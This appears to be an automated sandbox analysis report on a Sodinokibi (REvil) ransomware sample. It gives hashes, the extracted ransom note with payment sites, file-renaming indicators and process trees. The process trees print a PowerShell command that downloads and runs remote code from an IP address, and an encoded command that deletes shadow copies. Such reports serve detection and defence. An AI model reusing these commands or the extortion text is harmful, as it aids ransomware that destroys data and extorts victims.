sodinokibi | ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838

General

Target

02e935713bd82b8d92596478da846147.bat
Size

222B
MD5

709373b57a3c4758065b1f72f1a19b2d
SHA1

b820438ee7bcc43e84373b68f9fec3bedc10c25a
SHA256

ab2207ca32e7d0e2434060e8a2d6cb8bf247c9d3174fe86c5c06fb0100c31838
SHA512

d5061ac40ed9258dcb412dcf5eb05fe716affcd44a388b81b9b89e29317f51138fc8e7a13d1f195a5d3647736aea67c66a1d73fb4cff70406851cd2c29f1816f

Score

10^/10

ransomware persistence sodinokibi

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147

Extracted

Path

C:\3o0686-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 3o0686. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A852CC17EF37947 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/3A852CC17EF37947 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: zMbBh3NRNbCrV9GJWTKKp3cX+KpBN3RvBUMigq5YA/2117ZSLQ2Efp8+v5ezpKW7 heQZCCAGxGQVgDVvCWPZrTqAGkLI9ZV7xWhOm5QtsvRtU4h3GE63J11k/cfFeeX5 p669Z6gCnjq0lXnIq3yxN1mvPPtxl4AM5zklF8BoMi+0efP4HND+6uD7fH6/7Ijm TNuIbjOy3vohgkDsrWz69aY6i6vkKOuQel1ZgtJDKk4dgeiYEOFNcy4XRW+mG63F KIIQHMif2Nr+x+460uEjKLIIrkuPO0ltd2i+V47mcLpbF9ytUew3aouXPUaIz4iK 0ivEp4aR5AjRqBGRq3iRCNOwC9FC3BXyYFsipmlKNx5CLp3UsFKtRvKuVXaOi2/H 8PkN2HudFIlXoeG0/loJB7LIFq4Y3mGWq5jGunfuSokomezMjuMYACzKCg2WbVSy sX3cxinv3gfAhsQ7L+QBYtivqgOqcVDFsxgXH4lGHJZ/ry7/RLqNOZLs01xddrmt aCy0D8Iw1OK5i4r4LQitHoKIvKrxvuELsSgmPdWbRI4nlv0YEWESqKh2kQ5ShV2z lkpvRSV++d09qHGZ1aBIwym6BPRA1/r+O84WFMh4+fkd0f8TenwSOQEYsIg9BvkA kgo+5LhIqj2lTfCTZyfb7S8GvZVIY6YZkZ3XS2kUOpkyEcwwuvBTLoSAj7f9wU/r SlJKKDM/rJfu8EeqRkqF2d2C1qmPKdoB+2/CSC6Mk10aHDqYhyWj8BkiQ7erx0GV zNOfcGDG0RxiWFNi8V1w0q3E6l+ewPPTQuUg+8yCfxLccT5OCctHwus5J0z2H/2N gE3CLzvXPmdu49ILCdr7+w4ECXp6wMjyN2G8Lz2ey7Y3pjqBtMsakm5AE/0++H0J 8i7hLfVwEmWAxv4DWGXM/YXKBh5InxkTNTqlX2ETvo50bjbuGYkBoXFJwKmA4/RE I1L+WbPJIqTuGKz85f7H5+5SPS9GQg82XDwq0RF2lrI5+N/xv5cO6oFOCVcGvvoW BSsQbN2kdEvxLgSHvEddpSiGouvXBFte6CNiETmOciVcy9qBBNrVwbxKDFt1GNde QEhfWmD2++950az1B3mprD8THQKeuZW2GGB+oC3Hv82qkOIxC1YZoA4FPLYNGjn5 U6dyhmepHjvULgdO8muhBp0RgabKV8S9QxJWYz+xUtswyXcQLQrvn2GaWlUFjjE6 eOEzgGGW7Min1UCv3Y7rF/4nshhcPvT6ROphSEOxDAuSNRhmx1jlQsh3u3LwOgAA rmUL2veidJyDKE1162L0ZnLZENCWPvvFyz2Q82e9b2Q= ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3A852CC17EF37947

http://decryptor.cc/3A852CC17EF37947

Signatures

Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
ransomware sodinokibi

Blacklisted process makes network request 61 IoCs

Processes:

powershell.exe

flow	pid	process
4	1072	powershell.exe
6	1072	powershell.exe
11	1072	powershell.exe
12	1072	powershell.exe
14	1072	powershell.exe
15	1072	powershell.exe
17	1072	powershell.exe
19	1072	powershell.exe
21	1072	powershell.exe
22	1072	powershell.exe
24	1072	powershell.exe
26	1072	powershell.exe
27	1072	powershell.exe
29	1072	powershell.exe
30	1072	powershell.exe
32	1072	powershell.exe
33	1072	powershell.exe
35	1072	powershell.exe
37	1072	powershell.exe
38	1072	powershell.exe
42	1072	powershell.exe
44	1072	powershell.exe
45	1072	powershell.exe
46	1072	powershell.exe
49	1072	powershell.exe
51	1072	powershell.exe
52	1072	powershell.exe
54	1072	powershell.exe
56	1072	powershell.exe
58	1072	powershell.exe
59	1072	powershell.exe
61	1072	powershell.exe
63	1072	powershell.exe
64	1072	powershell.exe
66	1072	powershell.exe
68	1072	powershell.exe
70	1072	powershell.exe
72	1072	powershell.exe
75	1072	powershell.exe
76	1072	powershell.exe
78	1072	powershell.exe
80	1072	powershell.exe
81	1072	powershell.exe
83	1072	powershell.exe
85	1072	powershell.exe
87	1072	powershell.exe
89	1072	powershell.exe
90	1072	powershell.exe
92	1072	powershell.exe
94	1072	powershell.exe
95	1072	powershell.exe
97	1072	powershell.exe
99	1072	powershell.exe
101	1072	powershell.exe
102	1072	powershell.exe
104	1072	powershell.exe
105	1072	powershell.exe
107	1072	powershell.exe
109	1072	powershell.exe
111	1072	powershell.exe
113	1072	powershell.exe

Modifies extensions of user files 6 IoCs

Ransomware generally changes the extension on encrypted files.

ransomware

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\users\admin\pictures\UnprotectSwitch.tiff	powershell.exe
File renamed	C:\Users\Admin\Pictures\ConvertFromStop.raw => \??\c:\users\admin\pictures\ConvertFromStop.raw.3o0686	powershell.exe
File renamed	C:\Users\Admin\Pictures\InstallDisable.raw => \??\c:\users\admin\pictures\InstallDisable.raw.3o0686	powershell.exe
File renamed	C:\Users\Admin\Pictures\RevokeSubmit.crw => \??\c:\users\admin\pictures\RevokeSubmit.crw.3o0686	powershell.exe
File renamed	C:\Users\Admin\Pictures\SkipRemove.png => \??\c:\users\admin\pictures\SkipRemove.png.3o0686	powershell.exe
File renamed	C:\Users\Admin\Pictures\UnprotectSwitch.tiff => \??\c:\users\admin\pictures\UnprotectSwitch.tiff.3o0686	powershell.exe

Enumerates connected drives 3 TTPs

Query Registry
T1012

Peripheral Device Discovery
T1120

System Information Discovery
T1082
Drops file in System32 directory 1 IoCs

Processes:

powershell.exe

description ioc process

File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe

description	ioc	process
File opened for modification	C:\Windows\System32\CatRoot2\dberr.txt	powershell.exe

Modifies service 2 TTPs 4 IoCs

persistence

Modify Registry

T1112

Modify Existing Service

T1031

Processes:

vssvc.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer	vssvc.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer	vssvc.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1131729243-447456001-3632642222-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\2756p6c2gi.bmp"	powershell.exe

Drops file in Program Files directory 38 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	\??\c:\program files\OptimizeFormat.mht	powershell.exe
File opened for modification	\??\c:\program files\SaveDisable.potm	powershell.exe
File opened for modification	\??\c:\program files\UpdateTrace.mp2	powershell.exe
File opened for modification	\??\c:\program files\AssertWait.bmp	powershell.exe
File opened for modification	\??\c:\program files\GetResize.tif	powershell.exe
File opened for modification	\??\c:\program files\MountImport.001	powershell.exe
File opened for modification	\??\c:\program files\SelectConvertFrom.ogg	powershell.exe
File opened for modification	\??\c:\program files\UseLock.pcx	powershell.exe
File opened for modification	\??\c:\program files\ConvertFromDisable.css	powershell.exe
File opened for modification	\??\c:\program files\UseStart.mpg	powershell.exe
File opened for modification	\??\c:\program files\BackupWatch.xps	powershell.exe
File opened for modification	\??\c:\program files\DenyCompare.aif	powershell.exe
File opened for modification	\??\c:\program files\DenyRegister.rtf	powershell.exe
File opened for modification	\??\c:\program files\EnterEdit.htm	powershell.exe
File opened for modification	\??\c:\program files\InvokeReceive.gif	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\3o0686-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\MountPop.aiff	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\3o0686-readme.txt	powershell.exe
File created	\??\c:\program files (x86)\3o0686-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\ResolveCompare.temp	powershell.exe
File opened for modification	\??\c:\program files\RegisterRemove.wmx	powershell.exe
File opened for modification	\??\c:\program files\BackupConnect.midi	powershell.exe
File opened for modification	\??\c:\program files\DebugEnter.mp3	powershell.exe
File opened for modification	\??\c:\program files\DisableBlock.m1v	powershell.exe
File opened for modification	\??\c:\program files\EnableRead.jpeg	powershell.exe
File opened for modification	\??\c:\program files\FindRead.aifc	powershell.exe
File opened for modification	\??\c:\program files\GroupSubmit.edrwx	powershell.exe
File opened for modification	\??\c:\program files\TraceUnblock.vsw	powershell.exe
File created	\??\c:\program files\3o0686-readme.txt	powershell.exe
File created	\??\c:\program files\microsoft sql server compact edition\v3.5\desktop\3o0686-readme.txt	powershell.exe
File opened for modification	\??\c:\program files\EnterResize.M2T	powershell.exe
File opened for modification	\??\c:\program files\ExitJoin.png	powershell.exe
File opened for modification	\??\c:\program files\ProtectUse.eprtx	powershell.exe
File opened for modification	\??\c:\program files\CopyRepair.zip	powershell.exe
File opened for modification	\??\c:\program files\SaveRevoke.ex_	powershell.exe
File opened for modification	\??\c:\program files\UpdateUnprotect.m4a	powershell.exe
File opened for modification	\??\c:\program files\WriteExport.odp	powershell.exe
File opened for modification	\??\c:\program files\GroupConvert.ADT	powershell.exe

Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs

Processes:

powershell.exe

pid process

1072 powershell.exe
Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1072 powershell.exe
1072 powershell.exe
1072 powershell.exe
1940 powershell.exe
1940 powershell.exe

pid	process
1072	powershell.exe

pid	process
1072	powershell.exe
1072	powershell.exe
1072	powershell.exe
1940	powershell.exe
1940	powershell.exe

Suspicious use of AdjustPrivilegeToken 7 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	1072	powershell.exe
Token: SeDebugPrivilege	1940	powershell.exe
Token: SeBackupPrivilege	1560	vssvc.exe
Token: SeRestorePrivilege	1560	vssvc.exe
Token: SeAuditPrivilege	1560	vssvc.exe
Token: SeTakeOwnershipPrivilege	1072	powershell.exe

Suspicious use of WriteProcessMemory 8 IoCs

Processes:

cmd.exepowershell.exe

description	pid	process	target process
PID 1612 wrote to memory of 1072	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1072	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1072	1612	cmd.exe	powershell.exe
PID 1612 wrote to memory of 1072	1612	cmd.exe	powershell.exe
PID 1072 wrote to memory of 1940	1072	powershell.exe	powershell.exe
PID 1072 wrote to memory of 1940	1072	powershell.exe	powershell.exe
PID 1072 wrote to memory of 1940	1072	powershell.exe	powershell.exe
PID 1072 wrote to memory of 1940	1072	powershell.exe	powershell.exe

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\02e935713bd82b8d92596478da846147.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1612

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/02e935713bd82b8d92596478da846147');Invoke-WIWBLXHVRXNAAOB;Start-Sleep -s 10000"
2⤵
- Blacklisted process makes network request
- Modifies extensions of user files
- Drops file in System32 directory
- Sets desktop wallpaper using registry
- Drops file in Program Files directory
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1072

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1940

C:\Windows\system32\vssvc.exe
C:\Windows\system32\vssvc.exe
1⤵
- Modifies service
- Suspicious use of AdjustPrivilegeToken
PID:1560

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

1

T1031

Privilege Escalation

Defense Evasion

Modify Registry

2

T1112

Credential Access

Discovery

Peripheral Device Discovery

Query Registry

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Defacement

1

T1491

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_231c2208-0720-4eec-b9f1-8bba11abd9fa

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_57c6647c-75fc-47bb-8ce4-3b8f0921c533

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6d5fa298-996f-4fc9-9c01-b2226cbdaeba

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_7d6878ec-2a8b-418c-8f2b-b6fcd4b50cf8

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_e43ce3f6-b60d-4b70-bed1-86e53bf07360

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fabbb9cf-9b8c-4b2f-b33d-0de7a9a3a10e

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndex

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Download Submit
memory/1072-5-0x0000000004850000-0x0000000004851000-memory.dmp

Filesize
4KB

Download
memory/1072-21-0x0000000006250000-0x0000000006251000-memory.dmp

Filesize
4KB

Download
memory/1072-22-0x0000000006330000-0x0000000006331000-memory.dmp

Filesize
4KB

Download
memory/1072-14-0x0000000006160000-0x0000000006161000-memory.dmp

Filesize
4KB

Download
memory/1072-13-0x00000000056F0000-0x00000000056F1000-memory.dmp

Filesize
4KB

Download
memory/1072-8-0x0000000005640000-0x0000000005641000-memory.dmp

Filesize
4KB

Download
memory/1072-0-0x0000000000000000-mapping.dmp

Download
memory/1072-4-0x0000000002410000-0x0000000002411000-memory.dmp

Filesize
4KB

Download
memory/1072-3-0x0000000004930000-0x0000000004931000-memory.dmp

Filesize
4KB

Download
memory/1072-2-0x0000000000940000-0x0000000000941000-memory.dmp

Filesize
4KB

Download
memory/1072-1-0x0000000073F90000-0x000000007467E000-memory.dmp

Filesize
6.9MB

Download
memory/1940-23-0x0000000000000000-mapping.dmp

Download
memory/1940-25-0x0000000073F90000-0x000000007467E000-memory.dmp

Filesize
6.9MB

Download

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads